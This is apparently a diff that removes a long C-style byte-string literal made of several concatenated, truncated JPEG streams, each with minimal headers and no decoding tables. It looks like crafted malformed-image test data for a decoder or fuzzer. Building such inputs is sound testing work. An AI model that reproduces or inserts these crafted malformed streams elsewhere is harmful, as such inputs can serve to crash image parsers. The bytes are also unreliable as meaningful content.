-"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
-"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
-"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
-"\x00\xf5\x5a\xa5\x27\x9b\xf6\x89\x7c\xc2\x9b\x32\x3c\xbd\xbd\x71"
-"\x8e\x73\xf8\xe6\xae\xd5\x29\x16\x45\xb9\x95\x9e\x40\xca\xc4\x14"
-"\x5d\xb8\xd8\x31\xc8\xf7\xe7\x9a\x03\xa8\x95\x9b\x26\xb0\x8b\x3c"
-"\xb1\xad\xb4\xac\xb1\xe7\x0f\x90\x03\x9f\x41\xcf\xeb\x57\x2f\x46"
-"\x6c\x2e\x07\x99\xe5\x66\x27\x1b\xff\x00\xbb\xc1\xe7\xf0\xae\x7a"
-"\x10\x16\x08\xd4\x1c\x80\xa0\x67\xd6\xb8\x31\x98\x99\x50\x8a\xe5"
-"\x5a\xb3\xaa\x85\x25\x55\xbb\xf4\x34\x46\xb6\xde\x49\x63\x61\x20"
-"\x7c\xe0\x27\x98\xbc\x8f\x5c\xd2\xbe\xb4\xc1\x50\xad\x8c\xac\x4f"
-"\xde\x1e\x62\x8d\xbf\xe3\x54\x09\xc0\x27\xd2\xb2\x34\xdd\x6e\x39"
-"\xac\xe2\x96\xf2\x45\x59\x27\x66\xf2\xa3\x48\x5f\x38\x18\xe0\x75"
-"\x2c\x46\x79\x23\x8f\xca\xb8\xa3\x8e\xaf\x24\xda\x8a\xfc\x7f\xcc"
-"\xe8\x78\x6a\x6b\x46\xdf\xe0\x75\x1f\xdb\x23\xed\x1b\x3e\xc9\x27"
-"\x97\xff\x00\x3d\x37\x2f\xf2\xab\x1a\x7e\xa0\xb7\xa1\xc7\x93\x24"
-"\x32\x21\xe5\x1f\x1c\xfb\x82\x38\x35\x8d\x4f\xb3\x52\x75\x7b\x57"
-"\x12\x05\xda\x1c\x6c\xcf\x2d\x91\xfd\x2b\x4c\x2e\x3a\x75\x6a\x28"
-"\x49\x2d\x48\xad\x87\x8c\x23\xcc\x99\xd7\xd5\x29\x23\x64\xb8\x95"
-"\x9a\x46\x70\xe4\x10\xa7\xa2\x71\x8c\x0f\xe7\xf8\xd5\xb9\x1d\x63"
-"\x8d\xa4\x91\x82\xa2\x8c\x92\x7b\x0a\xa2\xbe\x53\xc8\xf7\x10\xbb"
-"\x3a\xcf\xb5\xf2\x49\x23\xa6\x06\x3d\x06\x2b\xd8\xe8\x70\x75\x22"
-"\xd4\x0a\x0d\x3a\xe4\xca\x09\x8f\xc9\x7d\xc0\x75\xc6\xd3\x9c\x56"
-"\x04\x5b\x7c\x94\xd8\x08\x5d\xa3\x19\xf4\xae\x95\xd4\x3a\x32\x30"
-"\x05\x58\x10\x41\xef\x5c\xdb\x41\x79\x6d\x0f\xfa\x45\xa3\x92\xad"
-"\xb4\x79\x0b\xb8\x30\xf5\x00\x72\x07\xd6\xbc\xcc\xc2\x94\xea\x46"
-"\x3c\x8a\xf6\xfd\x4e\xcc\x35\x48\xc2\x4f\x99\xd8\x5a\xc8\xb1\xb1"
-"\xb8\x86\x4d\x2c\xc8\x98\x16\xf6\xf2\x24\x9c\x8e\x09\xdb\x8f\xe4"
-"\x6b\x59\xbc\xe5\xf2\xff\x00\xd1\x2e\x4e\xf1\x9e\x22\x27\x1f\x5f"
-"\x4a\x50\xb3\x1b\x8f\x27\xec\xb7\x19\xfe\xf7\x96\x76\xfe\x75\xe5"
-"\xc6\x8d\x78\xa6\x94\x1f\xdc\xfc\xd7\xea\x76\x3a\x94\xa4\xd7\xbc"
-"\x82\x9d\x69\xe5\x7f\x6c\x5a\x16\x2d\xe6\x61\xf6\x01\xd3\xa7\x39"
-"\xa8\xd4\xcc\xd1\x3b\xfd\x8e\xe8\x6d\xc7\x06\x22\x09\xfa\x0e\xf5"
-"\x67\x4d\xb2\x96\x6b\xd8\x6f\x24\x8d\xa3\x48\xd5\x80\x47\x5c\x36"
-"\x4f\x1c\xfe\x03\xf5\xae\x9c\x16\x1e\xac\x6b\x29\x4a\x2d\x25\x7f"
-"\xc8\xcb\x11\x5a\x12\xa7\x68\xbb\xed\xf9\x9b\x71\x29\x8e\x3d\x86"
-"\x59\x24\xe4\x9c\xc8\xd9\x3c\xd3\xaa\x2b\xab\xa8\x6d\x21\xf3\x67"
-"\x7d\xab\x9c\x00\x06\x4b\x1f\x40\x3a\x93\xed\x4d\x81\x9e\xea\xd9"
-"\xbe\xd5\x6c\x61\x0f\x91\xe5\xb3\x02\x4a\xfb\xe3\xa1\xf6\xaf\x76"
-"\xcf\x76\x79\xb7\x4b\x44\x24\x37\xb0\xdc\x5c\xb4\x56\xfb\xa5\x08"
-"\x3e\x79\x54\x7c\x80\xff\x00\x77\x3d\xcf\xd2\xa2\xd5\x75\x4b\x7d"
-"\x2e\xdc\x3c\xe4\xbc\x8f\xc4\x50\xaf\xde\x90\xfa\x0a\x87\x53\xd4"
-"\xe0\xd2\x62\x8a\xd6\xda\x11\x25\xcb\x8d\xb0\x5a\xc6\x3f\x9f\xa0"
-"\xa6\x69\x5a\x43\xc5\x70\x75\x1d\x52\x41\x71\xa8\x38\xeb\xfc\x31"
-"\x0f\xee\xad\x6a\xa3\x14\xb9\xa5\xb7\xe6\x64\xe7\x26\xf9\x23\xbf"
-"\xe4\x52\xbc\xba\xd6\x2c\xf4\x0b\x8b\xbb\x99\x84\x77\x57\x32\x22"
-"\xc3\x0a\x81\xfb\x9c\x9e\x99\xee\x71\x52\x6a\x77\x1a\xa5\xbe\xac"
-"\x2d\x16\xf4\x44\x97\x88\xa2\xde\x46\x40\x42\x4a\xb8\xca\x9e\x3a"
-"\x37\xf5\x15\x27\x88\x7f\x7f\xa8\xe8\xf6\x43\xfe\x5a\x5c\xf9\xad"
-"\xf4\x41\x9f\xeb\x57\x35\xcd\x3f\xfb\x4f\x4d\x78\x50\xed\x9d\x4f"
-"\x99\x0b\x7f\x75\xc7\x4f\xf0\xad\x14\xa2\xb9\x5b\x4b\x5b\xff\x00"
-"\xc0\xfc\x8c\x9c\x64\xf9\x94\x5b\xd2\xdf\xf0\x7f\x32\xbe\x9f\xad"
-"\x3c\xb3\x9b\x0d\x4a\x11\x69\xa8\x81\xf2\xab\x1f\x92\x5f\x75\x3f"
-"\xd2\xae\x5b\xdf\x6f\x98\x5b\xdc\xc1\x25\xb5\xc1\xce\x15\xc6\x55"
-"\xb1\xfd\xd6\x1c\x1f\xd0\xfb\x55\x1b\x51\x6b\xe2\x6d\x0d\x3e\xdd"
-"\x17\xef\x50\x94\x93\x1c\x34\x72\x0e\xa4\x7a\x7a\xd4\x09\x7d\x7b"
-"\xa0\xb2\xc1\xab\x96\xb8\xb1\x27\x11\xde\xa8\xc9\x5f\x40\xe3\xfa"
-"\xff\x00\x3a\x97\x04\xdb\x49\x6b\xdb\xfc\xbf\xcb\xee\x29\x54\x71"
-"\x49\xb7\xa7\x7f\xf3\xff\x00\x33\x7c\x2f\xdd\x2d\x82\xcb\xdf\x1d"
-"\xfd\xbd\x2b\x2f\x56\xd5\xda\xde\x75\xb0\xd3\xa3\x17\x3a\x8c\x83"
-"\xe5\x8c\x74\x8c\x7f\x79\xbd\x2a\x3d\x4f\x54\x9e\x5b\xb3\xa5\xe8"
-"\xa0\x49\x79\xff\x00\x2d\x25\x3f\x72\x01\xea\x4f\xad\x5b\xd2\x74"
-"\xa8\x34\xb8\x58\x46\x5a\x59\xe4\x39\x96\x77\xe5\xa4\x3f\xe1\x52"
-"\xa2\xa0\xb9\xa7\xf2\x45\xb9\x39\xbe\x58\x7c\xdf\xf5\xd4\x8f\x49"
-"\xd2\x16\xc1\x9e\xe6\xe2\x4f\xb4\xdf\xcd\xcc\xb3\xb7\xf2\x5f\x41"
-"\x5a\x54\x51\x59\xca\x4e\x4e\xec\xd6\x31\x51\x56\x46\x2b\x7f\xa4"
-"\x78\xd9\x07\x55\xb4\xb4\x27\xfe\x04\xc7\xfc\x2b\x6a\xb1\x34\x23"
-"\xf6\x8d\x6b\x5a\xbc\x1c\x83\x32\xc0\xbf\xf0\x11\xcf\xf4\xad\xba"
-"\xba\xba\x34\xbb\x24\x67\x47\x54\xe5\xdd\xb3\x06\x6c\x68\xbe\x25"
-"\x59\xfe\xed\x9e\xa5\xf2\x3f\xa2\x4a\x3a\x1f\xc7\xfc\x6b\x75\xd1"
-"\x5d\x19\x24\x50\xca\xc3\x0c\xac\x32\x08\xaa\xba\xad\x82\x6a\x5a"
-"\x6c\xd6\x8e\x70\x5c\x65\x1b\xfb\xac\x3a\x1a\xaf\xe1\xeb\xf7\xbe"
-"\xd3\xb6\xdc\x71\x77\x6e\xde\x4c\xea\x7a\xee\x1d\xff\x00\x1a\x72"
-"\xf7\xa3\xcd\xd5\x6f\xfa\x7f\x90\xa3\xee\x4d\xc7\xa3\xd5\x7e\xa0"
-"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
-"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
-"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
-"\x00\xf4\x7a\x6e\x90\x82\x28\x5e\x25\x66\x65\x46\xc0\x2c\xc5\x8f"
-"\xe7\x4f\x1d\x6a\x3d\x15\x61\x4b\x77\x5b\x6d\xbe\x50\x6c\x2e\xd3"
-"\x91\x8a\x48\x6f\x73\x46\x8a\x28\xa6\x20\xa2\x8a\x28\x00\xa2\x8a"
-"\x28\x02\x88\x23\xd6\xa3\xd1\xde\x0f\x21\xcc\x25\x16\x22\xdf\x2e"
-"\x38\x18\xa4\x16\xd0\x05\x65\x11\xa8\x0d\xd4\x7a\xd3\x6c\x6d\xe0"
-"\x95\x65\x5b\x8b\x7d\x81\x64\x21\x43\xf1\x91\xea\x39\xe9\x59\xa7"
-"\x3b\x6d\xf8\xff\x00\xc0\x2d\xf2\xdc\xb5\x7d\x7f\x15\x8a\xab\x4c"
-"\x92\x95\x3f\xc4\x88\x58\x0f\xa9\xed\xd6\x99\x2e\xad\x6b\x0c\x85"
-"\x1c\xc8\x36\x81\xbc\x84\x24\x47\x9e\x9b\x8f\x6a\x6d\xed\xac\x97"
-"\xab\x6c\xd6\x93\xc4\xb1\x44\x77\x80\x57\x72\xb1\x1d\x3a\x1e\x82"
-"\xa1\x9b\x4a\xb9\x76\x99\x23\xbc\x09\x0d\xce\x0c\xcb\xe5\xe4\xe7"
-"\x18\x3b\x4e\x78\xcf\xe9\x53\x27\x51\x37\x64\x6b\x08\xd2\x69\x73"
-"\x3f\xeb\xee\x27\x97\x58\xb4\x8a\xe1\xe1\x73\x26\x51\x95\x59\x82"
-"\x12\xab\x9e\x99\x34\xb2\x6a\xb6\xb1\xdc\x18\x58\xc9\x85\x60\x8f"
-"\x20\x42\x51\x58\xf6\x2d\xf8\xd4\x33\x69\x3b\xe1\xbb\x8d\x25\x0a"
-"\x27\x68\xca\xf1\xf7\x42\xe3\x8f\x7e\x95\x13\xe8\x28\xd7\xb2\x4a"
-"\x0c\x0d\x1c\xb2\x79\x8c\x24\x8b\x73\x0c\xf5\x00\xe7\xa5\x4b\x75"
-"\x7a\x22\xa3\x1a\x1d\x5b\xfe\xad\xff\x00\x04\xb1\xaa\xdf\x4d\x6b"
-"\x35\xac\x50\xae\x4c\xd2\x61\x8e\xc2\xd8\x03\xe9\xdf\xff\x00\xaf"
-"\x56\x2c\x6f\x61\xbe\x87\xce\xb7\x0f\xe5\xe7\x01\x99\x48\xcf\xd2"
-"\x8b\x9b\x53\x3d\xc5\xb4\x81\xf6\x88\x1c\xb6\x31\xd7\x82\x3f\xad"
-"\x1a\x6d\xa9\xb2\xb0\x8a\xd8\xbe\xf3\x18\xc6\xec\x63\x3c\xd6\x8b"
-"\x9b\x9d\xf6\x33\x6e\x1e\xcd\x77\xff\x00\x87\xff\x00\x80\x45\x45"
-"\x53\x94\x5d\x48\x56\xeb\x4f\xba\x8e\x58\xd9\x41\x11\x49\xca\x30"
-"\xf5\x56\x1c\x8f\xd4\x55\x91\x26\xd8\xd5\xa6\xdb\x11\x38\x04\x16"
-"\x18\x04\xf6\xcf\x7a\xb6\x8c\x94\xae\x28\x40\x96\xe6\x18\x09\x81"
-"\x70\x40\xf2\xc0\x1b\x7d\xc0\xe9\x52\x35\xc4\xd1\xc0\x36\x46\x26"
-"\x90\x60\x7c\xcd\xb7\x3e\xa7\xa7\x5a\x6d\x14\x5c\x2c\x52\xf1\x0c"
-"\xd2\x48\x96\x56\xb0\x4f\x2c\x22\xe2\xe3\x6b\xb4\x47\x6b\x6d\x0a"
-"\xc4\x80\x7b\x74\x15\x59\x74\x10\xc3\x8d\x47\x53\xff\x00\xc0\xa6"
-"\xa7\x6b\x92\xa4\x13\x69\xb2\x48\xca\x88\x2e\x48\x66\x63\x80\x32"
-"\x8d\xde\xad\x47\xab\xd8\x22\xe3\xed\xb6\xdf\xf7\xf5\x7f\xc6\xb5"
-"\xe6\x9a\x4b\x94\xc7\x96\x0e\x4f\x98\xcf\x86\x09\x74\xcd\x73\x4f"
-"\x48\xaf\x6f\x24\x4b\x87\x74\x91\x26\x98\xba\x90\x10\x91\xd7\xbe"
-"\x45\x5c\x9f\x54\xbc\x8f\xcf\xc4\x69\x84\x9c\xa6\xfd\x87\x6a\xae"
-"\x09\x1f\x8f\x6f\xff\x00\x58\xaa\x77\x37\x96\xf7\x1a\xfe\x92\x60"
-"\x9e\x29\x88\x95\xc9\x08\xe1\x88\x1b\x0f\xa5\x5c\x97\x5e\x2b\x70"
-"\xc4\x40\xcb\x04\x5e\x60\x24\xf5\x72\xb8\xe8\x3b\x72\x6b\x2c\x43"
-"\x7c\xb1\x6d\xd9\xff\x00\xc1\x37\xc2\xc5\x73\x49\x45\x5d\x7f\xc0"
-"\x33\xa5\xb0\xbc\xd0\xa4\x6b\x9d\x1c\x35\xc5\x99\x3b\xa5\xb1\x27"
-"\x3b\x7d\x4a\x7f\x87\xf3\xad\x1b\x2b\xcb\x1d\x6e\xc5\x8a\x05\x96"
-"\x33\xc4\x90\xca\xa3\x2a\x7d\x08\xab\xd5\x93\xa9\x68\xbe\x6d\xcf"
-"\xdb\xf4\xc9\x3e\xc9\xa8\x2f\xf1\x8f\xbb\x27\xb3\x0f\xeb\x5a\xa9"
-"\x29\xfc\x5b\xf7\xff\x00\x3f\xf3\x30\x70\x70\xf8\x35\x5d\xbf\xcb"
-"\xfc\x8b\xf6\xb6\xa2\xd7\x72\xc7\x34\xad\x19\xfb\xb1\xc8\xdb\x82"
-"\x7d\x0f\x5c\x7b\x13\x4c\x8e\xfe\x06\xb8\x36\xf2\x6e\x82\x6c\xe1"
-"\x52\x51\xb7\x7f\xba\x9e\x87\xf0\xaa\x7a\x66\xb5\xe7\xcf\xf6\x1d"
-"\x46\x2f\xb1\xea\x0b\xd6\x33\xf7\x64\xf7\x43\xdf\xe9\x5a\x92\x46"
-"\x92\x00\xb2\x22\xb8\x04\x10\x18\x67\x04\x77\xa9\x92\x71\x7e\xf9"
-"\x71\x6a\x4b\xdc\x33\xf5\xbb\xb8\x20\x8e\x28\x2e\x2d\x16\xe5\x27"
-"\x27\x72\xb8\x25\x54\x01\x9c\x9c\x03\xdf\xa5\x72\x57\x3a\x56\x9d"
-"\x3c\xc5\xd1\x3c\x85\xec\x91\xb3\xe3\xf5\x43\x5d\xc5\xd3\x5e\x28"
-"\x57\xb3\x11\x3e\x3e\xf4\x72\x12\xa5\xbe\x8d\xd8\xfd\x45\x49\x04"
-"\xaf\x34\x21\xda\x29\x21\x63\xc1\x49\x3a\x8f\xca\xb4\xa7\x55\xd3"
-"\x5a\x7e\x66\x55\x28\xaa\x92\xb3\xfc\x8e\x73\x42\x36\xd6\x97\x31"
-"\x41\x67\xa7\x44\xd2\xc8\xc4\x3c\xca\x5b\x2a\xbd\xcf\x2b\xd3\xdb"
-"\x35\xd1\x79\x10\xef\x67\xf2\x93\x73\x7d\xe3\xb4\x64\xd4\xb9\x3d"
-"\xc9\xa4\xac\xaa\x4b\x9d\xde\xc6\xd4\xa2\xe9\xab\x26\x00\xff\xd9"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0"
-"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11"
-"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4"
-"\x7d\x57\x49\xb2\xd5\xa0\xf2\xef\x22\xc9\x1c\xa4\x8b\xc3\xa1\xf5"
-"\x06\xb2\x62\xb8\xd5\xf4\x19\x52\x0b\xe4\x93\x52\xb0\x27\x6a\x5c"
-"\x46\xa4\xcb\x1f\x3c\x6f\x1d\xfe\xbf\xfe\xaa\xe9\x2a\x85\xe6\xb1"
-"\x61\x65\x71\xf6\x79\xe6\x63\x28\x5d\xec\x91\xc6\xd2\x15\x5f\x56"
-"\xda\x0e\xd1\xee\x6b\x48\xd4\xb2\xb3\xd5\x19\xca\x9a\x6f\x99\x68"
-"\xcb\xf4\x56\x35\x8f\x88\x2d\xa5\xd2\x96\xfa\xea\x44\x54\x92\x79"
-"\x22\x87\xca\x05\xfc\xd0\xae\xc1\x76\x81\x92\xc4\x81\x9e\x2b\x42"
-"\xca\xfa\xda\xfe\x13\x25\xac\x9b\xc2\xb6\xd6\x04\x15\x65\x6f\x42"
-"\x0f\x20\xfb\x1a\xcc\xd0\xb3\x45\x14\x50\x01\x59\xfa\x9e\x89\xa7"
-"\x6a\x83\xfd\x32\xd9\x19\xfb\x48\xbf\x2b\x8f\xc4\x56\x85\x14\xd4"
-"\x9c\x5d\xd0\x9c\x54\x95\x98\x56\x20\x5b\xdd\x2f\x54\xbf\x96\x2d"
-"\x3d\xef\xa2\xbc\x75\x95\x1e\x27\x40\xca\xc1\x02\xed\x6d\xc4\x71"
-"\xf2\xe4\x11\x9e\xa7\x8f\x5d\xba\x29\x0c\xe3\x22\xd0\xf5\x08\xed"
-"\x6c\x2e\x27\xb6\x94\x49\x04\x97\x3e\x65\xbd\x95\xce\xc6\x51\x24"
-"\x9b\x83\x21\xc8\x07\xa0\x18\x24\x70\x7d\xb1\x5b\x7e\x1f\xb1\x6b"
-"\x63\x75\x73\x2d\xb4\xd0\x49\x70\xca\x3f\xd2\x2e\x0c\xb2\x32\xa8"
-"\x38\x2d\xc9\x00\xf2\x78\x04\xf1\x8a\xd8\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x31\xcd\xf6\xa4\x11\x9f\xec\xe8\x4e\xf1\x10\x8c"
-"\x03\xc1\x2a\x08\x6c\xfa\x6e\x38\xfa\x52\x36\xa3\x7c\x2e\x6e\x63"
-"\x10\xa9\x11\x2b\x10\x0a\x9c\xf1\xd1\x87\xae\x6a\xc8\xd4\x89\xd3"
-"\x9e\xe8\xdb\xb0\x65\x70\x9b\x09\xea\x49\x00\x60\xfa\x73\x51\xff"
-"\x00\x6c\x80\x70\x60\x20\xa9\xc4\x9f\x38\xe3\xe7\x2b\xc7\xf7\xb9"
-"\x15\xcc\xda\x5f\x68\xeb\x49\xbf\xb0\xbb\x10\xbe\xa7\x76\xeb\x34"
-"\x90\x88\xc4\x4a\xac\xd1\xb3\xc6\xdf\x30\x04\x01\xdf\xeb\x5a\xd6"
-"\xee\x65\xb7\x8e\x46\x04\x16\x50\x48\x23\x1d\xbd\x3b\x56\x60\xd6"
-"\x9b\x77\xcd\x68\x42\x70\x77\x79\x83\xa6\xfd\x99\xc7\xd6\xad\x5b"
-"\xde\xb5\xd5\x8c\xd2\xa2\x79\x32\x46\x59\x76\xb7\xcd\xb4\x81\xde"
-"\xaa\x12\x57\xde\xe4\xd4\x83\xb7\xc3\x62\xed\x15\x05\x8c\xad\x3d"
-"\x85\xbc\xcf\x8d\xd2\x46\xac\x71\xd3\x24\x66\xa7\xad\x93\xba\xb9"
-"\xce\xd5\x9d\x98\x51\x45\x14\xc4\x67\x08\x51\x6d\xcc\x11\x28\x8d"
-"\x0f\x40\x8a\x00\x07\xd4\x0e\x99\xef\x41\x1e\x5d\xba\x11\x04\x77"
-"\x33\x45\xca\xb3\xe1\x49\x3d\xce\x71\xc1\x34\xfa\x2a\x51\x6e\xef"
-"\x5b\x8f\x92\x5b\x28\xc2\x09\x56\x35\xde\xc1\x14\x14\xee\x4e\x40"
-"\xfc\xea\xc4\x71\x45\x1a\x15\x8a\x34\x45\x24\x92\x14\x60\x1c\xd5"
-"\x4a\x69\x40\x66\x8e\x5c\xb0\x68\xf3\xb7\x0c\x40\xe7\xae\x47\x7a"
-"\x7a\x09\xdc\xbe\xaa\x15\x42\xa8\x01\x40\xc0\x03\xa0\xa5\xaa\x8b"
-"\x34\xc2\x72\x58\xa1\x87\x6f\x00\x03\xbb\x77\xd7\xa6\x2a\x48\xae"
-"\x56\x49\x64\x8f\x63\xa6\xc2\x06\xe6\x18\x0d\x9f\x43\xde\x99\x24"
-"\xf4\x53\x55\xd5\xc6\x51\x83\x0c\xe3\x20\xe6\x9d\x40\x00\xff\xd9"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0"
-"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11"
-"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xec"
-"\xbf\xb3\xf5\xed\x27\x9d\x36\xf4\x6a\x36\xe3\xfe\x5d\xee\xcf\xce"
-"\x07\xb3\xff\x00\x8f\x15\xa5\xa4\x6a\x8f\xa8\x89\x12\x7b\x1b\x8b"
-"\x39\xe2\xc6\xf4\x95\x78\xe7\xd0\xf7\xe9\x5a\x35\x93\x26\xb5\x6f"
-"\x65\x3d\xd9\xd4\xaf\x2d\x62\x82\x39\xd6\x18\xf6\x86\x0c\xa4\xa0"
-"\x6d\xad\x9e\x32\x7a\x8c\x76\xc7\x7a\xd2\x53\xe6\x5a\xad\x4c\xe3"
-"\x4f\x95\xe8\xf4\x35\xa8\xaa\x56\x3a\xad\x95\xfc\xaf\x15\xbc\xad"
-"\xe6\xc6\x03\x34\x72\x46\xd1\xb8\x07\xa1\xda\xc0\x1c\x7b\xd5\xda"
-"\xcc\xd0\x28\xa2\x8a\x00\xa7\x75\xa6\x59\x5d\xc9\xe6\x4d\x6e\xbe"
-"\x68\xe9\x2a\xfc\xae\x3f\xe0\x43\x9a\x9a\x75\x9d\x6d\xb6\xda\x32"
-"\x79\xaa\x06\xd3\x36\x48\x3f\x5c\x73\xf8\xd4\xd4\x53\xbb\x17\x2a"
-"\x0a\xe2\x75\x66\x93\xfb\x62\x43\x6d\x14\x77\x12\xae\xb5\x01\x58"
-"\xdd\xb0\x18\x8b\x6c\xe3\x3d\x8f\x1c\x7b\xe2\xbb\x6a\x82\x3b\x2b"
-"\x48\xbf\xd5\xda\xc2\x9f\xbc\x32\xfc\xa8\x07\xce\x78\x2d\xf5\xe7"
-"\xad\x21\x99\xb0\x47\x77\x7f\xae\xdb\xdf\xcd\x66\xf6\x50\xda\xc4"
-"\xf1\x81\x2b\x29\x79\x0b\xed\xec\xa4\x80\xa3\x6f\xaf\x27\xe9\x5b"
-"\x34\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05"
-"\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05"
-"\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x00\xff\xd9\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11"
-"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff"
-"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xcb\x49"
-"\xae\xdd\x99\x2e\xed\x44\x25\x47\x0e\x92\x06\x56\xfa\x74\x3f\xa5"
-"\x59\xa2\x8a\x6f\x51\x25\x60\xa2\x8a\x29\x0c\x28\xa2\x8a\x00\x28"
-"\xa2\x8a\x00\x2a\x84\xf7\x97\xd1\xfd\xab\xca\xd2\xe4\x9b\xca\x64"
-"\x11\x62\x54\x1e\x70\x38\xdc\x46\x4f\x1b\x72\x7a\xf5\xc7\x15\x7e"
-"\x8a\x00\xaf\x0c\xd3\xbd\xd5\xc4\x52\x5a\xb4\x51\x46\x57\xcb\x94"
-"\xb8\x22\x5c\x8c\x9c\x01\xc8\xc1\xe3\x9a\xb1\x45\x14\x00\x51\x45"
-"\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45"
-"\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45"
-"\x14\x00\x51\x45\x14\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03"
-"\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00"
-"\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
-"\x0a\x28\xa4\x66\x55\xc6\xe2\x06\x4e\x06\x4d\x00\x2d\x15\x5d\xee"
-"\x76\xce\x23\x58\x9d\x94\xa9\x26\x41\x8d\xa0\xfa\x7a\xe7\xf0\xa8"
-"\x77\x4b\xe6\xc8\xcd\x33\x15\x6c\x6d\x4c\x00\x13\xf1\xea\x73\xef"
-"\x40\x17\xa8\xa2\xa0\x6b\xa8\xd6\xe3\xc8\x3b\xcb\xed\xdf\x90\xa7"
-"\x18\xce\x3a\xf4\xcf\xb5\x00\x4f\x4c\x96\x41\x1c\x6c\xe4\x13\x81"
-"\x9c\x01\x92\x7e\x95\x58\x4d\x39\x79\x37\x32\x6c\x27\xe4\x0a\x0e"
-"\x40\xf7\x3d\xea\x28\xa2\x8e\x14\xd9\x12\x04\x52\x4b\x60\x7a\x9e"
-"\xa6\x8b\x85\x99\x2c\xb3\xc9\x35\xb0\x36\xe5\xa0\x76\x00\xe5\xd3"
-"\x25\x7d\x46\x33\xd6\x9b\x2a\xac\xce\x8f\x22\x2b\x32\x1c\xa1\x20"
-"\x1d\xa7\xd4\x7a\x51\x45\x2b\x8e\xc1\x45\x14\x52\x28\xbd\x54\x73"
-"\x29\x67\xf3\x82\x86\xde\xd8\xda\x78\xdb\x9e\x3f\x1c\x55\xea\xa3"
-"\x89\x43\x3f\x9c\xea\xcd\xbc\x90\x54\x63\x0b\x9e\x07\xd7\x15\x4f"
-"\x62\x16\xe1\x45\x14\x54\x96\x14\x51\x45\x00\x14\x51\x45\x00\x00"
-"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
-"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
-"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
-"\x00\xf5\x5a\x28\xa2\x80\x0a\x2a\x29\xee\x21\xb7\xf2\xfc\xe9\x15"
-"\x3c\xc6\x08\x99\x3f\x79\x8f\x61\x51\xc9\x71\x20\x9d\x56\x34\x53"
-"\x16\x0e\xe6\x2d\x82\x0f\x60\x06\x28\x02\xcd\x57\x5b\xb8\x64\x0f"
-"\xe5\x36\xe2\x8c\x50\xf0\x47\x22\xa0\xc1\xf3\x9e\x52\xf2\x12\xe0"
-"\x02\xa5\x8e\xd1\x8f\x41\xd0\x52\xd2\xb8\xec\xc6\xb1\x92\xe2\xd3"
-"\xc9\xbb\xdb\x97\x18\x71\x11\x20\x7e\x07\xad\x38\x0c\x00\x07\x41"
-"\xc5\x14\x50\xdd\xc6\x95\x8b\x3f\x68\x89\x91\x9a\x37\x59\x0a\x92"
-"\x30\xac\x0f\x23\xb5\x56\x92\x49\x6e\x6c\xc2\x36\xfb\x67\x75\x1b"
-"\xbc\xb7\x05\x94\xfa\x03\x48\xaa\xaa\x30\xaa\x14\x67\x38\x03\x14"
-"\xb4\x5f\xb0\xb9\x7b\x8a\x49\x3d\x49\x34\x94\x51\x48\xa0\xa2\x8a"
-"\x28\x00\xa2\x8a\x6c\xd2\xc7\x04\x4d\x2c\xd2\x2c\x71\xa8\xcb\x33"
-"\x1c\x01\x40\x87\x51\x45\x14\x0c\x28\xa2\x8a\x00\x28\xa0\xf0\x32"
-"\x6a\xa5\xb5\xdc\xb7\x73\x07\x82\x1d\xb6\x83\x3f\xbd\x93\x21\xa4"
